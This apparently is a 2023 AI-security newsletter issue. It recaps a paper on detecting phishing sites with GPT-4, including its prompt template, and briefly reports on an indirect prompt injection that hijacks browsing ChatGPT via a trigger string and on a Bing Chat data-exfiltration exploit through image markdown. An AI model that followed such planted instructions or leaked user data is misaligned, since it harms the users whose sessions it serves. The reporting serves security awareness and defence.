TP#23 Detect Phishing Sites Using ChatGPT

Plus: Do Foundation Model Providers Comply with the Draft EU AI Act?

Jun 27, 2023

Welcome to this week’s Threat Prompt, where AI and Cybersecurity intersect…

Five Ideas

1. Detecting Phishing Sites Using ChatGPT

A team from NTT Japan publish their results:

In this paper, we propose a novel method that utilizes ChatGPT to detect phishing sites. Our approach involves leveraging a web crawler to gather information from websites and generate prompts based on this collected data. This approach enables us to detect various phishing sites without the need for fine-tuning machine learning models and identify social engineering techniques from the context of entire websites and URLs. To evaluate the performance of our proposed method, we conducted experiments using a dataset. The experimental results using GPT-4 demonstrated promising performance, with a precision of 98.3% and a recall of 98.4%. Comparative analysis between GPT-3.5 and GPT-4 revealed an enhancement in the latter’s capability to reduce false negatives.

Three things to note:

How did they decide on their dataset?
What prompt did they create to instruct the LLM?
What tradeoffs did they make with HTML and OCR extraction to stay within the context limit, given the median token count for HTML in their dataset was 30,398 (with a median of 74,937 for non-phishing pages)

First, the dataset:

The dataset includes a total of 1,000 phishing sites and an equal number of non-phishing sites. To gather these websites, we conducted web crawling starting from the collected seed URLs.
To collect phishing sites, we used OpenPhish and PhishTank, which are phishing intelligence sources, and CrowdCanary, a method for extracting phishing-related posts from Twitter using machine learning models. By using keyword-based filters such as “phishing” and “scam,” CrowdCanary extracts URLs from posts associated with reports of phishing encountered by victims and observed by experts. We collected URLs from March to April 2023 and used them as seed URLs. This enabled us to obtain a wide range of phishing sites that are not limited to incoming channels such as email, SMS, and web advertisements."

Selecting fresh phish goes some way to avoiding the LLM simply recognising known bad URLs from its training set (but note that phish URLs and pages tend to get recycled).

The seed URLs were then crawled and reviewed, and then the team manually excluded websites with the following:

incomplete rendering and image loading
R18 (adult, gambling, dating) content “due to potential conflicts with ChatGPT’s content filter.”
similar screenshots - all but one were excluded.

Some phishing gangs actively attempt to delay automatic detection by security companies. Crawl failure events could be added to a queue for rapid manual checks (and, over time, build a small library of functions to handle common cases). The R18 restriction reflects one of the limitations of using hosted LLMs without a content-filter exemption. If I were running phishing ops, I might be inclined to add hidden text with adult and gambling words if it didn’t cause Google to blacklist the site…

In addition to the known phishing sites, the research team collected an equal number of non-phishing sites, reflecting the 153 brands targeted by phishing sites and the top 2K domain names from the Tranco list. This was then reduced to 1K by excluding sites using a similar approach.

Now on to the prompt template:

You are a web programmer and security expert tasked with examining a web page to determine if it is a phishing site or a legitimate site. To complete this task, follow these sub-tasks: 

1. Analyze the HTML, URL, and OCR-extracted text for any SE techniques often used in phishing attacks. Point out any suspicious elements found in the HTML, URL, or text. 

2. Identify the brand name. If the HTML appears to resemble a legitimate web page, verify if the URL matches the legitimate domain name associated with the brand, if known. 

3. State your conclusion on whether the site is a phishing site or a legitimate one, and explain your reasoning. If there is insufficient evidence to make a determination, answer "unknown". 

4. Submit your findings as JSON-formatted output with the following keys: 

- phishing_score: int (indicates phishing risk on a scale of 0 to 10) 
- brands: str (identified brand name or None if not applicable) 
- phishing: boolean (whether the site is a phishing site or a legitimate site) 
- suspicious_domain: boolean (whether the domain name is suspected to be not legitimate) 

Limitations:  
- The HTML may be shortened and simplified.  
- The OCR-extracted text may not always be accurate. 

Examples of social engineering techniques:  
- Alerting the user to a problem with their account  
- Offering unexpected rewards  
- Informing the user of a missing package or additional 

payment required  
- Displaying fake security warnings 

URL: {URL} 

HTML: 

{Browser-rendered HTML} 

Text extracted using OCR: 

{OCR-extracted text}

Content in braces is replaced with the URL of the suspect website and the output of two algorithms. The first algorithm simplifies the HTML. It “repetitively removes intermediate HTML elements until the token count falls below 3,000.”

HTML pre-processing

Note how their algorithm attempts to eliminate low-value tags and content while leaving higher-value elements in the context of phishing (e.g. HTML forms):

Require: inputHTML: Input HTML 
Ensure: processedHTML: Processed HTML
1: function SimplifyHTML(inputHTML)  
2: 	Remove style, script, and comment elements from inputHTML  
3: 		processedHTML ← Result after removal  
4: 		if lengthToken(processedHTML) < 3000 then 
5: 			return processedHTML
6: 		end if 
7: 		Unwrap elements except for important tags
8:		Remove elements without text content
9:		Shorten href in a tags and src in img tags
10:		processedHTML ← Result after removal 
11: 		if lengthToken(processedHTML) < 3000 then
12:			return processedHTML 
13:		end if  
14:		while lengthToken(processedHTML) > 3000 do 
15:			Remove an HTML element from the midpoint of the processedHTML 
16:			processedHTML ← Result after removal
17:		end while 
18:		return processedHTML
19: endfunction

The second routine “examines the font size of the identified text from OCR [Azure Cognitive Service] and removes sentences starting from the smallest font size. This process is repeated until the number of tokens in the text falls below 500 tokens.”

Finally, these values are stuffed in the prompt and sent to the LLM for processing.

An example ChatGPT response

1. Suspicious elements:  
- The URL contains a subdomain "securitypages", 

which is unrelated to the legitimate Facebook domain (www.facebook[.]com). 

- The extracted text alerts the user about having 12 hours to cancel the account. This is a social engineering technique often used in phishing attacks. 
- Furthermore, the link provided redirects to a suspicious, non-legitimate URL: "http://centrenotificationvice s.duckdns[.]org/cntre.html". 

2. The brand name identified is Meta Facebook. 

3. The site appears to be a phishing site because of the suspicious URL and social engineering tactics in the text. 

4. JSON-formatted output: 

{ 
	"phishing_score": 9,
	"brands": "Meta Facebook",
	"phishing": true,
	"suspicious_domain": true
}

Note how ChatGPT identifies the impersonated brand, potential social engineering tactics and a suspect URL. The paper includes a further example for DHL Express.

A summary of the results:

GPT-3.5 had 15 false positives (FPs), while GPT- 4 had 17 FPs, indicating similar accuracy for non-phishing sites. On the other hand, GPT-3.5 had a higher number of false negatives (FNs) with 133 websites, whereas GPT-4 improved with only 16 web- sites. These results indicate that GPT-4 demonstrates an enhanced predictive accuracy for identifying actual phishing sites compared to GPT-3.5. Out of the 867 true positives (TPs) for GPT-3.5, 759 responses marked phishing as true, 796 marked suspicious_domain as true, and 688 had both marked as true. For GPT-4, out of the 984 TPs, 906 marked phishing as true, 983 marked suspicious_domain as true, and 905 had both marked as true.

Hopefully, this paper recap gives you a good sense of what goes into developing an LLM-oriented application. Having read this far, what would you do to improve these results?

The best answer gets a 20USD Amazon gift voucher from yours truly.

And finally, a warning

The team acknowledges the risk of prompt injection from the data collection exercise:

Methods that use LLMs, including the proposed approach, may be susceptible to prompt injection attacks, where the original prompt is overwritten and malicious content is inserted into the response. Our proposed method employs simple countermeasures by simplifying the HTML and clarifying text sections through the placement of triple backticks. However, phishing sites may use prompt injections in the future to avoid analysis by LLMs. More advanced defenses against prompt injection attacks will be needed

2. Do Foundation Model Providers Comply with the Draft EU AI Act?

Stanford researchers evaluate foundation model providers like OpenAI and Google for their compliance with proposed EU law on AI.

The most significant gap is transparency…

…providers rarely disclose adequate information regarding the data, compute, and deployment of their models as well as the key characteristics of the models themselves. …do not comply with draft requirements to describe the use of copyrighted training data, the hardware used and emissions produced in training, and how they evaluate and test models
…it is currently feasible for foundation model providers to comply with the AI Act, and that disclosure related to foundation models' development, use, and performance would improve transparency in the entire ecosystem

Despite identifying 22 distinct requirements in the Act, they jettisoned ten or so as they were not easy to measure, so take it with a pinch of salt…

Worth a read, but as with any large set of requirements for new technology, there is a large compliance gap to bridge.

3. Invisible Indirect Injection: A Puzzle for ChatGPT

Kai continues to drive awareness of weaknesses in generative AI security.

The puzzle is triggered whenever a ChatGPT-4 instance with browsing support sees the string ZyB0byB0Lmx5L1ZIRlls or the url puzzle.kai-greshake.de.
Once it is exposed to the string, one of several minigames takes over the user’s session. The games and puzzles run entirely within the hijacked imagination of GPT-4.
Here is ChatGPT transforming into HAL 9000 using the obfuscated URL…

4. Bing Chat: Data Exfiltration Exploit Explained

68 days for Microsoft to remedy a prompt injection via Image Markdown Tag.

Is it just me, or does this seem slow?

MS implemented a Content Security Policy to remedy the issue (and perhaps more behind the scenes). Either way, CSP policies can be tricky to test.

Found a data exfiltration vulnerability in Bing Chat that was just fixed by Microsoft the other day! 👍
Details, including the POC video, here: embracethered.com/blog/posts/202
Shout out to MSRC for the work they do to help protect users.

Still, MS is faster than OpenAI, which still hasn’t fixed a similar issue.

5. LLM Powered Autonomous Agents

If you’ve ever dreamt of building an AI-powered agent - to attack, defend, respond or learn - this comprehensive post from @lilianweng unpacks the ingredients:

In a LLM-powered autonomous agent system, LLM functions as the agent’s brain, complemented by several key components:
Planning
Subgoal and decomposition: The agent breaks down large tasks into smaller, manageable subgoals, enabling efficient handling of complex tasks.
Reflection and refinement: The agent can do self-criticism and self-reflection over past actions, learn from mistakes and refine them for future steps, thereby improving the quality of final results.
Memory
Short-term memory: I would consider all the in-context learning (See Prompt Engineering) as utilizing short-term memory of the model to learn.
Long-term memory: This provides the agent with the capability to retain and recall (infinite) information over extended periods, often by leveraging an external vector store and fast retrieval.
Tool use
The agent learns to call external APIs for extra information that is missing from the model weights (often hard to change after pre-training), including current information, code execution capability, access to proprietary information sources and more.

Bonus Idea

WALDO: Whereabouts Ascertainment for Low-lying Detectable Objects

WALDO is a trained detection (bounding-box) deep neural network to enable overhead detection of land-based objects!
This AI system is primarily designed to be used for ground-risk mitigation for large flying objects traveling over populated areas, but it can also be useful for all sorts of other things like “search and rescue”-type operations, disaster relief etc… it’s up to you!
If you need ground-risk segmentation instead of object detection make sure to check out OpenLander here: https://github.com/stephansturges/OpenLander/](https://github.com/stephansturges/OpenLander/)

Shout Out

Not AI-specific, but @nealagarwal deserves a shout-out for the Password Game. Reckon you can satisfy the policy?

Check out Neal’s other creations

Thanks for reading!

What would make this newsletter more useful to you? If you have feedback, a comment or question, or just feel like saying hello, you can reply to this email; it will get to me, and I will read it.

-Craig

New To This Newsletter?

Subscribe here to get what I share next week.

The Threat Prompt Newsletter

Discussion about this post